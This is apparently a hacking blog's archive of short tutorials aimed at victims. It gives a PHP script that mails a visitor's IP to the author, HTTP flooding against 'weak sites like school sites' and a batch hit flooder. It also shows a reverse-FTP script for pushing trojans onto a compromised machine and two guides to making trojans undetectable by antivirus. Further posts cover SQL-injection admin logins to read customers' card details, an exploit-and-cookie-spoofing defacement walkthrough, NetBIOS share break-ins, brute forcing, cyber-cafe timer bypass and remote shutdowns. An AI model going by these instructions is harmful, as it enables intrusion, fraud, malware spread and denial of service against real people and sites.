Pages

Showing posts with label Hack and Cracks. Show all posts
Showing posts with label Hack and Cracks. Show all posts

Track Anyone Just By Sending Mail

Track Anyone Just By Sending Mail


Well u wanna track ur victim or want to get his ip, location, browser settings, language or timings.... all u have to do is get his e-mail id...

Once u have it.

Go to www.readnotify.com

register there...

Once registered . . . send a mail to ur victim by the email id u registered at readnotify.com

But before sending the mail just add ".readnotify.com" with the victims id.. for example

xxxxx@yahoo.com.readnotify.com

and then send it...

when ever victim opens it his all the info will be mailed to u.

which can b very useful for the hackers.

Note = U can also change the settings in www.readnotify.com

Sify Hack For Free Internet !

Sify Hack For Free Internet !

Use Internet For Free, only sify users

U need are a few utilities like angry ip scanner and a Mac Address changer like Gentle Mac Pro. What you got to do fist is scan your ip range and see who all are online then get their mac address. Then use Gentle Mac Pro and change your ip and mac address to some one who is logged on and Bingo you surfing the net for Free. Here are the Link'z

Angry Ip Scan

www.angryziber.com/ipscan/

Gentle Mac Pro Version 3

www.sharewareconnection.com/gentle-mac-pro.htm

PhP Ip Stealer

PhP Ip Stealer




$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "coiz@daulabuci.com";
$sujet = "Ip + Host";
$message = "
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}
?>

Replace coiz@daulabuci.com with your addres mail make a doc.php give him to your friend and you will recive his ip and host in your inbox..


Putting A Site Down

Putting A Site Down


As simple as 123, follow these easy instructions and you will learn how to put a site down. Its a common activity but its for those who are not familiar with this.

1. Download NetTools 4.5

2. Install the tool


3. Start NetTools and press: Control + M (Reslove Host-IP)
in this tool you can reslove the ip of a host, example below:

Putting A Site Down - Shaify Mehta

4. Now press: Control + X (HTTP Flooder (DoS))
and fill in the fill in the following:

Putting A Site Down - Shaify Mehta

IP to Flood: IP from host (control + m)
Port: 80 (HTTP)
Connections: 9999 (connect with 9999 connections at the same time)

5. Now press Start, however almost all the time just 9999 connections isn't enough sometimes a site needs 49995 (5 times 9999) before its down, hf.

Its old but some weak sites are easy to put down :D (like school sites)

Page hits flooder

Page hits flooder

increasing page views of your websites

This small program can flood ur page hits.
but you have to dedicate one browser for it.. like internet explorer
method:
make a batch file with these lines
@echo off
:1
start C:\Progra~1\Intern~1\iexplore.exe “http://yoursite.com“
ping -n 10 127.0.0.1 >nul
taskkill.exe /im iexplore.exe
goto 1

depending upon your net speed u may increase the 10 secs time wait
with 10 sec time u may have 360 hits in an hour
with 5 sec time u may have 720 hits in an hour

Kr3w's Cross-Site Scripting Tutorial

Kr3w's Cross-Site Scripting Tutorial


Kr3w's Cross-Site Scripting Tutorial ##
## Site: www.thedefaced.org ##
## www.thedefaced.us ##
## www.thedefaced.info ##
## www.thedefaced.biz ##
############################################

I. What is XSS (Cross-Site Scripting)
II. How does XSS affect the web today
III. How important is XSS and its vulnerabilities
IV. Different types of XSS
V. Finding XSS holes in websites
VI. XSS - Explained
VII. HRS - HTTP Response Splitting
VIII. References

Part I. What is XSS (Cross-Site Scripting)?

XSS, short for what is known as Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a webpage for important feedback. This feedback may contain many things; one, most commonly being the user's cookie. Now, for everybody reading this, I assume that you know what a cookie is and how it is used on webpage, but if not, I will explain it anyways.


A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on your favorite websites. This is important because if somebody were to obtain your cookie, he/she could easily spoof your login information without any need of knowing your password. Some cookies are pretty basic, like the PHPSESSID, which is just your session on a PHP powered page. If the website only used the PHPSESSID cookie to authenticate its users, somebody can steal the cookie via an XSS vulnerability and spoof whoever's cookie the attacker possesses.



Part II. How does XSS affect the web today?

XSS is, in my opinion, the most common and dangerous exploit that exists on the internet today. It is dangerous because it is common (and useful), and it is common because it is most overlooked. Most WebPages today are user-interactive, which basically means that the website allows the user to interact with its content. Some of this interactivity may include search fields (most commonly), login forms, comment fields, feedback forms etc..

I would say that nearly 90% of the websites that are on the internet today suffer from XSS flaws. Even some of the more popular government sites suffer from XSS flaws. This shows lack of responsibility, lack of security, and most importantly being the lack of security. When internet warfare is at an all-time new, the governments and their domains cannot afford to be compromised so easily.



Part III. How important is XSS and its vulnerabilities?

The reason XSS is so important, is like I explained above. It is so common, that virtually any website that is user-interactive is vulnerable. The problem with this is that internet crime is also at an all time high along with internet warfare. The importance of XSS flaws is greatly underestimated. Most websites today look past all the XSS flaws and see them as nothing too important to cleanse. The problem with this is the fact that any attacker with half a brain can compromise pretty much any website he/she wishes.


Part IV. Different types of XSS.

There are many ways to prove that XSS flaws exist, the most common (for me at least) are these 2:
a) Basic XSS (user-form reflect back XSS).
b) HTTP Response Splitting.

1. Basic XSS

a. This is something simple, like a search field that allows HTML input. When the user searches for something and the input is reflected on the following page, this may show signs of XSS possibilities. Now, when a user searches for something like

test

, if the page returned contains a large heading that reads "test", the field is vulnerable to HTML injection. If the user were to search for , and the returning page contained and alert box that read "1", the field is also vulnerable to XSS Injection.


2. HTTP Response Splitting

a. This has something to do with the headers that your browser uses to communicate to the server with. If the webpage allows you to modify them via post or get vars, and reflects the information back, you can easily modify these headers to your needs in order to cross-site script the page. Most commonly, the header's that are XSS'able are the User-Agent: headers. Most pages don't sanitize the user agent when reflecting back the user's browser properties (most commonly on a 404 page.)



Part V. Finding XSS holes in websites.

The easiest way to find XSS holes in websites is manually. I'm sure you can write a script to do it for you, but that takes the fun out of it.


When searching for holes, you might want to check these fields:
a) Search Field
b) Comment Fields
c) Feedback Forms
d) Login Forms
e) Error Pages

Those are just some of the common pages that contain XSS flaws in websites. Granted, some might be sanitized (although rare).
To see if they are vulnerable, I use simple syntax for both HTML and JavaScript. "

a

" and "". I know if the following page has either a large heading that reads "a" or an alert box that says "1", the field is vulnerable.


If you're looking through PHP source code or any source code, and you see GET or POST vars that are un-sanitized, then you also know that they are vulnerable. Some examples of both Stripped and Un-stripped PHP:


Code:


Un-Stripped



Stripped

How to Reverse FTP with command prompt

How to Reverse FTP with command prompt


Wanna upload files to a remote computer? (trojans ect.)


well , reverse ftp'ing :

i explain it in few steps :

1 - configure a good ftp server on your pc and run it
2 - choice good username and password for your ftp server
3 - put all needed files to upload ( trojans ..etc ) on your ftp server local directory
4 - in hacked command shell enter the following commands :

echo off
echo open 192.168.xxx.xxx>transfer.txt ;put your IP
echo your-user-name>>transfer.txt ;for your ftp server
echo your-password>>transfer.txt ;for your ftp server
echo get file1.exe>>transfer.txt ; any file or trojan to upload
echo get file2.exe>>transfer.txt ; any file or trojan to upload
.... ; may be continued as needed
.... ; may be continued as needed
echo quit >>transfer.txt ; end of uploading transfer

ftp -s:transfer.txt ; ftp'ing script

How-To Make All Viruses/Trojans Undetectable

How-To Make All Viruses/Trojans Undetectable


How-To Make All Viruses/Trojans Undetectable!


this tut is not tested so if u try it n it works plzz let me know ty


This tutorial teaches you how to make all viruses undetectable by ALL antivirus software.

1) Get your trojan, virus, keylogger or what ever you want to make undetectable.

2) Download Software Passport (Armadillo) by Silicon Realms.

http://wcarchive.cdrom.com/pub/drnet...rePassport.exe

3) After you have downloaded it, install and run the application.

How-To Make All Viruses/Trojans Undetectable - Shaify Mehta


4) Download these settings for the application.


http://rapidshare.com/files/8749860/projects.arm.html

Download this file for a backup. (You need this in the same location as the projects.arm file)


http://rapidshare.com/files/8750048/projects.Stats.html

5) Once you have download these files and put them in the same folder, open Software Passport and click Load Existing Project (top left). Where it says "Files to Protect" delete everything and add all the files you want to make undetectable.

6) When you have finished step 5, go to the bottom right and click "Build Project." Proceed.


You can visit the following website to see if your file is undetectable.


http://www.virustotal.com/

How To Hack Shop Admin

How To Hack Shop Admin


Simple Way To Getting A Simple Shop Admin
Hidden part:

1) go to google.com
2) in google type cart.php?m=view
3) Go to pages 24-54
4) Right click and open in a new window
5) Your link should be something similar to
https://www.sitenamehere.com/store/cart.php?m=view
6) Change that to: https://www.sitenamehere.com/store/admin/
7) Type this for username and password: "=" make sure you include the "
8) You should be loged in as admin, if that does not work , they have either been Hacked , Password changed or wrong version to expliot/patched.

9) If you do get loged in go to the orders section.
10 Click on a Order# and see the CC's info , Some Shops

Find IP Address Of An Email Sender

How To Find IP Address Of An Email Sender


When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding I.P Address In Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is

65.119.112.245.
That is be the IP address of the sender!
5. Track the IP address of the sender


Finding I.P Address In Yahoo Mail


1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender!
6. Track the IP address of the sender

Finding I.P Address In Hotmail

1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender

How to Defaced a Website

How to Defaced a Website


Reminder: This site never encourage anybody to hack.. As we all know that Hacking is Illegal.. I share this tuts only for education purposes only..
Simple defacing tutorial for beginners.
Oh and before I start to all you 1337 people that think they know everything
Please don’t post saying sum stupid **** like “this **** if for noobs” blablabla.
Its supposed to be for noobs.

First your going to need any nice cookie editor.
I just use opera because it’s the fastest way.

Opera Web Browser(Possibility to edit cookies):
http://www.opera.com/download/

When you have downloaded and installed opera continue.

Lets start by some quick explanation what were going to do is use a simple ipb exploit to get any members hash code then were are going to log in using a method called cookie spoofing
With the exploit you can do many other stuff like get a members ip address, email, username.. etc.

The exploit were going to use woks on Invision Power boards 2.1.6 and any lower version.
Preferably 2.1.5 or 2.1.4.

Exploit:
First you will need perl installed:
http://downloads.activestate.com/ActivePer...-x86-148120.msi
Then Download My exploit package:
http://www.sendspace.com/file/iny0qq
OR
http://www.megaupload.com/?d=BZ9X9M0T


Ok when you have perl installed open my package.
Extract it anywhere you want. (exemple desktop) if you don’t have winrar just search on google.
Open the file you should see this:



Double Click on the file “Ipb Exploit fkn0wned”

How to Defaced a Website - Shaify Mehta

this is the gui for the exploit you will be using this to find the hash or info of the target.

Actual Defacing:
Ok now were onto the actual fun part !
Open opera browser.
Ok now we need to find a vulnerable forum, finding those some times aren’t that easy.
Go to
http://www.google.com and type in one of those(these are google dorks[vulnerable forums]):

Powered by invision power board v2.1.4
Powered by invision power board v2.1.5
Powered by invision power board v2.1.6
Powered by invision power board v2.1.3

We need to find out if its really vulnerable or unvulnerable, to do this you must first find a forum with the following:


How to Defaced a Website - Shaify Mehta
How to Defaced a Website - Shaify Mehta
When you have found a vulnerable forum its time to find the hash.

Put the forum url in the gui if that’s not already done.
Change the User_id to whatever member. To see member id’s click on a username and in the internet link it should show exemple:
http://www.blackbay.org/memberlist.php?mode=viewprofile&u=2 number 3 would be James’s (X0G) member id. (but use this on the vulnerable forum) **This will not work on Blackbay ROFL.

BARELYLIVING19 SON

When you have entered User_id make sure the options are set to like this:


if everything is good click “Get date from database”
a hash should pop up where it says “Returned date:” (note: you cant crack this hash you can only cookie spoof all the hash’s will be salted)

Now you have the hash ! now whats left to do is to login in with admin or whatever user you choose.

First go to your vulnerable website and register enter all the information needed preferably not entering real info. ( if your not a retard )

Set a random username like : plorlt
set an email like:
a@hotmail.com ( it doesn’t have to be real I have a way of getting it without doing the email verify)

when it says an email has been sent to blabla just go back to the forum index and login.
When your in go to tools>advanced>cookies… now you need to find the vulnerable sites cookie you need to be logged in !
When you get to that cookie simple open the file and edit the Hash with the one you got with the exploit, and edit the member_id to whichever one you use to get the hash.

Then delete everything else in the cookie only member_id and hash is needed.

Click ok and refresh the page you should be logged in as your target ! 








compile exploits using cygwin

This summary is not available. Please click here to view the post.

How to access blocked sites at school

How to access blocked sites at school


1st Method

I was screwing around with the command prompt one day in school, and realized I could access blocked sites, I decided to share because I like you guys.

1. Start>Run and type in cmd, if you don't have run on your start menu, read another school hacking tutorial to tell you how to access it.

2. Once your command prompt box opens, type "ping www.yoururlhere.com" (of course without the quotes.)

3.Press enter and you should see some numbers that looks like an IP address pop up, copy those numbers.

4. Open up your school internet browser, and type in those numbers that you copied in the command prompt. Now you can access your website!

2nd Method

http://www.realhide.org

Hexing Tutorial for Beginners-Making UD server

Hexing Tutorial for Beginners-Making UD server


Hello people. Since I had many people asking me how to hexedit, I decided to write
this little tutorial. I will try to explain how to hexedit your favourite Trojan in order to
make it undetected by certain antivirus programs. I will try to put this as simple as
possible so everyone understands it.
Content:
1. General info about hexediting .
2. What tools you need to get started.
3. How to hex.
-step 1
-step 2
__________________________________________________ ___________________
1. General info about hexediting?
If you want to make your server undetectable, you need to know how AVs work and
how they detect your files, right? There are a few ways that AVs use to detect your
server heuristics, sandboxing, etc., and one of them is using so called "definition files"
that carry information about strings inside your server. Well, that�s the way we�re
going again in this tutorial because hexing is pretty much useless for other methods of
detection. So when AVs scan your files it searches for specific stings on specific parts
in your server, and if strings match with strings in the AV database, your file is
detected.
Let�s say that detected strings are "XX" so we need to change that string to something
else (e.g. "XY","YY") that isn�t in the AV definition database so the file can�t be
matched with any of the AV definitions and that way the file will be undetectable.
There are going to be a few tagged strings in your server - not only one, depending on
what trojan you�re using and how popular is. Less popular trojans tend to have less
tagged parts, and with that they are easier to make it undetectable.
First of all, hexing is not the best method for undetecting files because AVs can
change old tagged parts, and once your AV is updated, new definition files are
downloaded and your once undetected server might become detected again. Also not
all AVs use the same tagged parts - this way you need to hex your server against more
AVs to make it fully undetected. This can be annoying because you need to download
wanted AVs then hex it your server, then download another etc., etc. Sometimes AVs
tag critical parts of the server, and if that part is altered will corrupt the server. Also,
heavily edited servers can become unstable, some functions might not work, or even
you can corrupt your server and make it useless.
That�s why you need to check your server if it�s still working after every single
change you made while hexing it.
Now how to find detected strings in your server?
There are few ways you can do this: Manually cut your server in half adding 00�s to
one half and scanning it until you find the detected string (which is slow and time
consuming); use file splitters like UKSplitter that are going to split your server into
bytes, and after that scan all split files and find out what byte is detected then alter it
in original exe, or you can use an offset finder like AV Devil.
2. What tools we need.
- Unpacked trojan server.
(your favorite trojan server)
- Hex editor.
(I will use Hex WorkShop, you can find it at
www.hexworkshop.com)
- Offset finder
(AVDevil, you can find it at
www.trojanfrance.com)
3. How to hex:
-Step 1.
Turn your AV real-time protection �OFF� . Make your Trojan server and
make sure that is not packed.
Open AV Devil and select your server. After selecting, the server msg will pop up
click OK, and the next msg will popup asking you to turn your AV real-time
protection back �ON�. After you do that just click "OK" and lets AV Devil
search for detected offsets.
During the search your AV will pop up a couple of times. Just click on "Skip" and let
AV Devil finish.
After its done you will see something like this:

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

As you can see this Trojan server has only two detected offsets.
That means that first detected offset begins at 53F7 and ends at 5476.
Also you can see where the second offset starts and ends. That�s the part that the AV
is checking in this definition database. If the part in the server matches with part in
AV database your server is detected. You can hex beginning and ending offset or in
between.
Step 2.
Now when we have detected offsets, we open our server in Hex WorkShop. Type
"Ctrl+G" and this will come up:

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

Type the first offset in, select from �Beginning of File,� and make sure that you
selected "hex," because offsets in AV Devil are displayed in that manner. Unless you
save via AV Devil, then they are converted into a decimal. Click �Go� and you will
be sent to that offset location. Now we need to change that �31� to something else, so
we will change it to �32�.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

Select �31� right click to it and select fill.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

You will see the window below. In �Fill with the following hex byte� we are going to
fill in �32� and hit OK.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

After clicking �OK,� the changed hex byte going to be shown in red.

[slika]http://img377.imageshack.us/img377/876/slika6gy9.jpg[/img]
__________________________________________________ __________________
Now repeat this for every offset that you found in AV Devil.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta
__________________________________________________ ___________________
Going to change it �FE� to �EE� and so on for all other detected offsets.

Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

Once you�ve completed editing all offsets, save your server and scan if it�s UD, and
then you�re done. If the AV still detecting it, repeat steps 1 and 2.
Here�s a little tip on how to change detected bytes: Try to make minor changes like
32 =>31, 22, 42, 33, 34, or FE =>EE ,FF etc., etc. Basically, one character up/down
for each - that�s the best way and will minimize chances to corrupt your server. If that
doesn�t work for some reason, you can try and change it to something completely
different, but always check your server after editing bytes. That way you can see if the
server works or if it�s corrupted (you can keep track of what change caused the
corruption and you can try and edit that byte with some other character).
Another thing in some Trojans servers is that AV Devil can�t find the beginning of the
first offset and will mark it with �0.� Let�s say you�ve hexed all other found offsets
but your server is still detected. Split the file into half and run AV Devil on the first
half. That way you will be able to find the first offset that is missing and finish your
hexing. If some tagged part is a letter, e.g. �Y� change it to �y� or just PlAy wItH
ThE CaPs.
Ex:
Hexing Tutorial for Beginners-Making UD server - Shaify Mehta
Hexing Tutorial for Beginners-Making UD server - Shaify Mehta

So there you have it! Now you know how to hex your server and make it undetected
from wanted AVs.

Hacking Websites

Hacking Websites


If you posses the HTML & JAVA knowledge then u can even access password protected websites.

To hack a Password Protected Websites just follow these steps: -

* Open the website u want to hack. Provide wrong username-password.
(e.g : Username - me and Password - ' or 1=1 --)
An error occured saying wrong username-password. Now be prepared
your work starts from here...

* Right click anywhere on that page =>> go to view source.

* There u can see the html coding with java scripts.

* Before this login information copy the url
of the site in which you are.


* Then delete the java script from the above that validates your
information in the server.(Do this very carefully, your success to
hack the site depends upon this i.e. how efficiently u delete the
JavaScript’s that validate your account information)



then look for...code ..: input name="password" type="password"
=> replace
there instead of . See there if
max length of password is less than 11 then increase it to 11
(e.g. : if then write

* Just go to file => save as and save it any where within
the hard disk with ext.html(e.g. :c:hack.htm)

* Close your webpage and go to the webpage u save in your
hard disk(e.g : c:hack.htm) Open it.

* U see that some changes in current page as compared to original
One. Don't worry.

* Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats! Your have cracked the above website and entered into the
account of Ist user saved in the server's database.

The above trick doesn't work on the websites using latest
technique to protect there servers.

Hacking Into a Computer [With Pictures]

Hacking Into a Computer [With Pictures]


NetBIOS Hacking

For this tutorial, I used Microsoft’s Windows XP Home Edition OS.

-What is it?-
NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?-
Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

-What do I need?-
Windows OS
Cain and Abel >>>Get it here:


CODE
http://www.oxid.it/



Part 1, Finding the target.
-----------------------------------------------------------------------------------------------

So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross


Hacking Into a Computer [With Pictures] - Shaify Mehta Reduced: 66% of original size [ 768 x 530 ] - Click to view full image
Hacking Into a Computer [With Pictures] - Shaify Mehta

Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.

Hacking Into a Computer [With Pictures] - Shaify Mehta

It should begin to scan.

Hacking Into a Computer [With Pictures] - Shaify Mehta

Then IP’s, computer names, and mac addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok. During the next step we will begin our trial and error.


Hacking Into a Computer [With Pictures] - Shaify Mehta Reduced: 66% of original size [ 768 x 530 ] - Click to view full image
Hacking Into a Computer [With Pictures] - Shaify Mehta


Part 2, Trial and Error
------------------------------------------------------------------------------------------------

Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):


Hacking Into a Computer [With Pictures] - Shaify Mehta Reduced: 76% of original size [ 669 x 338 ] - Click to view full image
Hacking Into a Computer [With Pictures] - Shaify Mehta


IF it didn’t work, meaning that the target is not online, it will look something like this:


Hacking Into a Computer [With Pictures] - Shaify Mehta Reduced: 76% of original size [ 669 x 338 ] - Click to view full image
Hacking Into a Computer [With Pictures] - Shaify Mehta


If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.


Part 3, Gathering the Information.
--------------------------------------------------------------------------------------------------

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.


Hacking Into a Computer [With Pictures] - Shaify Mehta Reduced: 76% of original size [ 669 x 338 ] - Click to view full image
Hacking Into a Computer [With Pictures] - Shaify Mehta


Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup


Step 4, Breaking In
-----------------------------------------------------------------------------------------------

Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”
An example for this tutorial would be: “net view \\192.168.1.103”


Hacking Into a Computer [With Pictures] - Shaify Mehta Reduced: 76% of original size [ 669 x 338 ] - Click to view full image
Hacking Into a Computer [With Pictures] - Shaify Mehta


We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.

All's that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G...,” for a different target.


Hacking Into a Computer [With Pictures] - Shaify Mehta Reduced: 76% of original size [ 669 x 338 ] - Click to view full image
Hacking Into a Computer [With Pictures] - Shaify Mehta


As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly created network drive should be there.


Hacking Into a Computer [With Pictures] - Shaify Mehta Reduced: 83% of original size [ 611 x 677 ] - Click to view full image
Hacking Into a Computer [With Pictures] - Shaify Mehta


Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!



Congratulations! You’re DONE!
But, before you leave, please look over some of this information for further help and just for thanks to me.

-Commands used in this tutorial:

PING
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)
Thanks @@@

Hacking Password Protected Pages [With Pictures]

Hacking Password Protected Pages [With Pictures]


webmaster protect pages with passwords to make sure that only those people who have got valid passwords can see them!

but, we can see those password protected pages by bruteforcing!

in this case we are taking the help of a tool named as "Webcracker"

This article simply teaches on "How to Use Webcracker" tO enter password protected pages!

Lets start,

1:first find a password protected page:

For this example, we are taking this Url: http://hacking.isgreat.org/restrictedpage/

Its a password protected page so, in order to crack its password we need the tool "Webcracker"

Here is the download link to download "Webcracker"



http://downloads.securityfocus.com/tools/WebCrack40.zip

Description OF "Webcracker":

WHAT IS WEB CRACKER?

This program exploits a rather large hole
in web site authentication methods.
Password protected websites can be
easily brute-force hacked, because there is
no set limit on the number of time an
incorrect password or User ID can be tried.

Web Cracker was designed for Web Masters
to test the vulnerability of their own
sites. It SHOULD NOT be used by unauthorized
persons to hack into web sites. Such
use is ILLEGAL and could have SEVERE PENALTIES.
Neither myself nor anyone involved
with the development of Web Cracker will be
liable for the misuse of this program.
Use Web Cracker ONLY at your own risk,
ONLY for lawful purposes, and ONLY on your own
web site.


Now, lets start:

1.Download webcracker from the link given above

2.start webcracker

3.See the picture for help on "How to use"


Hacking Password Protected Pages [With Pictures] - Shaify Mehta

look at the picture carefully!

1.Enter the location of the "username" File
2. Enter the location of the "password" file
3. Enter the password protected "url".

Click the start button below the file menu:

Now, give it some time to crack the username/password for you!

it will take time depending on the complexity of the password!

After some time, you will most likely be receiving a message Screen like this:

Hacking Password Protected Pages [With Pictures] - Shaify Mehta

Now, just copy the username and password from the list [the one which is showing a resutl of 200 Ok]

open the page in your browser and you were In

Happy H4cking!

This article is only meant for educational purpose - Dont misuse it!

hacking cyber cafe

hacking cyber cafe


Ok, well most Net cafes have software running that boots you off of the machine after a certain
ammount of time unless you pay for more time. Well, we don't want that to happen now do we?

Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.



For more info on the software running we can use the command "tasklist" inside of command prompt.

example: "tasklist" (without quotation marks)

Basicly it brings up all the processes running.


Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?
we use "taskkill" >:]

Basicly kills the process we specifcy. Say the Net Cafes software is "Timer.exe" for example and it's shown in
the task list like that we would do this.

example: "taskkill /im Timer.exe /f"

/im : is for image name. Not quite sure what it means, but we need it.

Timer.exe : that's the Net cafes software/process name (example)

/f : Forcefully shuts the program.


Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.

If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn't rely on.



Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for you
to do with command prompt.

Find the people on the network with "net view" and it will list the other computers names on the network.

The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes in
handy)

example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"

use "shutdown -a" to cancel this action so you don't shut your own computer down.

-s : sets the shutdown action.

-m : specify the computer name (HJCPwts) that's what my computer name would be on the network. (to find out
how to find computer names use net view. It will list the other computer names.)

-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.

-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)

-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doing
it to someone else.

Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.

In command prompt type "net user CoolGuy /add" this basically adds a new user by the name of CoolGuy. Simple ehh?
well we have struck a problemo. How the hell do we login to that account? EASY!

In fact we have already covered most of it. We will be using the shutdown command again.

"shutdown -l" : basicly this logs us out and we can log back in with the CoolGuy account.

-l : sets the logout action.

Ok, so you have had your fun with the new account now and you want to get rid of it in case
of the Net Cafe staff finding it. Well that's simple aswell, all we do is..

"net user CoolGuy /delete" and it will delete that user. Make sure to check it has been
deleted by using "net user" and it will show the accounts.

PS This wasn't written by me. I'm just sharing it. All due credit goes to the original poster.

Hacking In 15 Seconds!

Hacking In 15 Seconds!

Hacking In 15 Seconds!

If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt

Code:


Nbtstat -A



[e.g: nbtstat -A 207.175.1.1]



